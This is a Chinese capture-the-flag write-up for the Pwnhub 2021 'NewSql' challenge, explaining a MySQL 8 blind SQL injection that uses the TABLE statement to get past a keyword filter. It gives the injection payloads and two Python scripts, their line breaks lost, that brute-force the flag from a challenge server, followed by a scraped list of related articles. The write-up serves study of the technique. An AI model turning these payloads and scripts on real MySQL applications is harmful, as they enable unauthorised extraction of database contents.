胖哈勃 web--NewSql Mysql 8 注入
是个Mysql8 特性,就是之前省赛那个,但是那个没复现到,就把这个当复现了吧。
过滤的东西,这个我没记,借鉴其他师傅的
空格 select union|and && updatexml extractvalue group|concat have sleep database insert|join where substr char mid > = || like regexp \ if exp
总结比较好的一篇文章Pwnhub2021七月赛NewSql(mysql8注入)
TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]
这个作用是列出表的全部内容,于是就可以利用这个语句来进行注入。
然后用于盲注的判断是
这个会让username=0&password=0然后如果有字符开头的username和password就会弱比较,返回ture通过登入到达home.php,然后记得删下cookie,就是PHPSESSID的值,不然会一直跳转home.php
我感觉用这个比较好
username='^'&password=1'^(payload)#
然后我们手动先测有几列
1'^(('{}','')<(table/**/information_schema.TABLESPACES_EXTENSIONS/**/limit/**/6,1))#
题比较温柔,还有报错提示
然后测出来是两个列
然后跑出库和表,基本上都是第7行开始,然后跑出了库是ctf是两个表users和f1aggghere
然后脚本判断条件是用的返回的长度,ture的时候是924,false是1742,用binary区分大小写
import requests
import sysurl="http://47.99.38.177:10084/index.php"
flag=""for i in range(100):for j in range(32,127):z=chr(j)#payload="1'^(('{}','')<(table/**/information_schema.TABLESPACES_EXTENSIONS/**/limit/**/6,1))#".format(flag+z)payload="1'^(('1',binary'{}')<(table/**/f1aggghere/**/limit/**/0,1))#".format(flag+z)data={"username":"'^'","password":payload}r=requests.post(url,data=data)if len(r.text)==1742:flag+=chr(j-1)print(flag)breakif j==126:flag=flag[:-1]+chr(ord(flag[-1])+1)print(flag)sys.exit(0)
flag{}里的内容
th1s1sthefl0gggth0ty0ua1waysw0nt
然后ascii码直接换字母数字和一些特殊字符会跑的快点,毛病也会少些吧,不过一定要注意ascii的小,另一个版本
import requests
import sysurl="http://47.99.38.177:10084/index.php"
ascii="/0123456789:;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_.{|}~"
flag=""for i in range(100):for j in ascii:#payload="1'^(('{}','')<(table/**/information_schema.TABLESPACES_EXTENSIONS/**/limit/**/6,1))#".format(flag+j)payload="1'^(({},'')<(table/**/f1aggghere/**/limit/**/0,1))#".format(flag+j)#payload="1'^(('def','ctf','{}','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table/**/information_schema.tables/**/limit/**/325,1))#".format(flag+j)data={"username":"'^'","password":payload}r=requests.post(url,data=data)if len(r.text)==1742:flag+=chr(ord(j)-1)print(flag)if flag[-1]=='.':print(flag[:-1])sys.exit(0)breakif j=='~':flag=flag[:-1]+chr(ord(flag[-1])+1)print(flag)sys.exit(0)
这个原因是因为比较的时候是弱比较,然后他的1是int型的
胖哈勃 web--NewSql Mysql 8 注入相关推荐
- web安全学习-sql注入-针对mysql的攻击
文章目录 1. 前言 补充:读取客户端本地文件到服务端mysql数据库 补充:利用全局日志写shell 补充:修改mysql的root密码 补充:配置远程登录 补充:低权限下读文件 补充:高版本mys ...
- mysql注入扫描网站漏洞工具_sql注入点扫描工具下载-PHP+MYSQL网站注入扫描工具免费版 - 维维软件园...
你想进行SQL网站注入扫描吗,那么你肯定需要使用专门的注入扫描工具了,请来下载PHP+MYSQL网站注入扫描工具试试吧,本工具是专门针对PHP网站所编写的一款小工具,软件界面是仿教程的hdsi中的PH ...
- web连接mysql数据库_java web与数据库相连,具体怎么做
展开全部 1.首先要移动mysql-connector-java-5.1.44-bin.jar到tomactde的lib目录下(我的目录是这样32313133353236313431303231363 ...
- 关于web安全之sql注入攻击
前言:①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖到昨天才开始着手准备,时间仓促, 能力有限,不到之处请大家批评指正: ②我尽量将文中涉及的各种技术原理,专业术语讲的更加通俗易懂,但这个前提是 ...
- mysql create注入语句_mysql注入总结
作者:L.N. 时间:2012-07-23 博客:lanu.sinaapp.com 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert.update) 0 ...
- PWNHUB 五月公开赛+内部赛 writeup(【5月公开赛】MyNotes TemplatePlay 【胖哈勃内部赛|五月,你好】MockingMail)
PWNHUB 五月公开赛+内部赛 writeup [5月公开赛]MyNotes [5月公开赛]TemplatePlay [胖哈勃内部赛|五月,你好!]MockingMail [胖哈勃内部赛|五月,你好 ...
- Web安全Day1 - SQL注入实战攻防
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 http ...
- javaweb实现mysql备份功能_java web 实现mysql 数据库备份、恢复
如题,由于项目需要,研究并实现了java web的 mysql数据库的备份.下载.恢复功能,中间遇到一些问题,耗费了不少时间,下面让我一一道来: 背景介绍: window 7系统 mysql 5.7 ...
- concat mysql sql注入_sql注入-mysql注入基础及常用注入语句
最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...
最新文章
- oracle 查看统计情报,Oracle 查看收集统计信息
- VS如何更改项目类型?
- 华字后面配什么字比较好_涟字女孩取名字含义 带涟好名推荐
- linux制作虚拟机镜像,为OpenStack制作CoreOS虚拟机镜像(基于CoreOS官方提供镜像)
- 蓝牙定位网关-蓝牙网关通过三角定位获取蓝牙设备的位置
- 【4】Git查看版本库当前状态
- 春晚宫女唐奕霖被爆背景深厚 可携助手出入央视排练场享有特权
- Hello hello world♥
- 好人?坏人?做真实的人
- [计算机网络作业]第一章章节习题
- 央视新闻30分:开心网流行背后存在的隐忧
- Sql server 2016 Always on 实现无域高可用
- 微信小程序之数独挑战九宫格
- jQuery元素列表遍历方法
- 三十九、Fluent时间步长的估算与库朗数
- jfinal连接oracle_jfinal数据库连接配置
- 2010款15寸Macbook Pro GPU panic崩溃问题解决方案
- 用手机直接播放电脑本地的视频文件
- 重要的聊天记录误删了怎么恢复?恢复聊天记录的方法
- 为DataGridView的一个列加入DateTimePicker控件